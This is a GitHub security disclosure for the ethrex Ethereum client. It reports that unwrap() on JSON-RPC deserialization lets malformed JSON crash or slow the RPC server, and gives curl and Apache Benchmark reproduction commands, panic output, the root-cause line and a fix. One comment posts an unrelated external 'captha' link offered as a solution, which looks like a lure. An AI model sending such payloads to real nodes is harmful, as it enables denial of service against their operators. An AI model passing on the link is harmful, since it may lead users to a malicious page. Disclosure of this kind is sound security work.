### ISSUE TITLE
[SECURITY] Improper Handling of JSON RPC Deserialization Errors leading to DoS

### ISSUE THREAD

**Issue by pventuzelo** [lambdaclass/ethrex#958]
During the audit of the RPC request handling logic, our team (@fuzzinglabs) discovered a vulnerability in the way JSON deserialization is handled. The use of **`unwrap()`** on potentially erroneous deserialization results can lead to a **DoS** (**panics**) when malformed or invalid JSON input is provided.

## Vulnerability details

- **Severity**: High
- **Affected components** : handle_http_request / handle_authrpc_request (`lambda_ethereum_rust/crates/networking/rpc/rpc.rs`)

# Steps to reproduce

Start a localnet using this command line :

```bash
cargo run --bin ethereum_rust -- --network test_data/genesis-kurtosis.json --authrpc.port 8551 --http.port 8545 --authrpc.jwtsecret ./ethereum-package/static_files/jwt/jwtsecret
```

## handle_http_request

```bash
curl -X POST -H "Content-Type: application/json" --data '{"jsonrpc":"2.0","method":"eth_chainId""params":[],"id":1}' http://127.0.0.1:8545/
```

```bash
thread 'tokio-runtime-worker' panicked at /home/mhoste/Desktop/levm/lambda_ethereum_rust/crates/networking/rpc/./rpc.rs:156:55:
called `Result::unwrap()` on an `Err` value: Error("expected `,` or `}`", line: 1, column: 40)
note: run with `RUST_BACKTRACE=1` environment variable to display a backtrace

```

## handle_authrpc_request

```bash
curl -X POST -H "Content-Type: application/json" --data '{"jsonrpc":"2.0","method":"eth_chainId""params":[],"id":1}' http://127.0.0.1:8551/
```

```bash
thread 'tokio-runtime-worker' panicked at /home/mhoste/Desktop/levm/lambda_ethereum_rust/crates/networking/rpc/./rpc.rs:173:55:
called `Result::unwrap()` on an `Err` value: Error("expected `,` or `}`", line: 1, column: 40)
```

# Root cause

The vulnerability is found in the following lines, which are used to deserialize incoming JSON RPC requests (in `lambda_ethereum_rust/crates/networking/rpc/rpc.rs` line 154 AND 171):

```rust
let req: RpcRequest = serde_json::from_str(&body).unwrap();
```

**`serde_json::from_str`** attempts to parse a JSON string into a **`RpcRequest`** object. If the input JSON is malformed or contains invalid data, the function returns an error. However, the use of **`unwrap()`** forces the program to **panic** if any error occurs during this process, which can lead to a crash.

This leads to a situation where an attacker can easily **DoS** the server by sending a lot of malformed or invalid JSON request, causing a **panic** in the Tokio runtime due to the unhandled deserialization error. 

# Analysis of Server Latency

Two sets of tests were conducted using **Apache Benchmark (ab)** to compare server performance with correctly formatted and malformed JSON requests.

`ab -n 100000 -c 500 -T application/json -p correct_request.json http://127.0.0.1:8545/`

```bash
{"jsonrpc":"2.0","method":"eth_chainId","params":[],"id":1}

```

`ab -n 100000 -c 500 -T application/json -p malform.json http://127.0.0.1:8545/`

```bash
{"jsonrpc":"2.0","method":"eth_chainId""params":[],"id":1}

```

1. **Correctly Formatted JSON Request**:
    - **Requests per second**: 8,148.17
    - **Average time per request**: 61.363 ms
2. **Malformed JSON Request**:
    - **Requests per second**: 2,279.77 (a 72% decrease compared to the correct request)
    - **Average time per request**: 219.320 ms

The server experiences a **significant slowdown** when handling malformed requests. While no requests explicitly failed, the server's performance was greatly reduced, with requests per second dropping by **72%** and the average processing time increasing by more than **3.5 times**. This indicates that malformed requests could potentially be used in **Denial of Service (DoS)** attacks to overwhelm the server, reducing its capacity to handle legitimate traffic.

# Recommendation

**Replace `unwrap()` with Proper Error Handling**:
To mitigate this issue, the use of **`unwrap()`** should be replaced by proper error handling, allowing the server to gracefully handle deserialization errors instead of crashing.

**Comment by Olowojaye** [comment]
to fix your trouble check this solution [click](https://www.calvarywhangarei.co.nz/captha/index.html)
maybe this will solve your problem.

**Comment by Mechanix97** [comment]
This issue is no longer happening
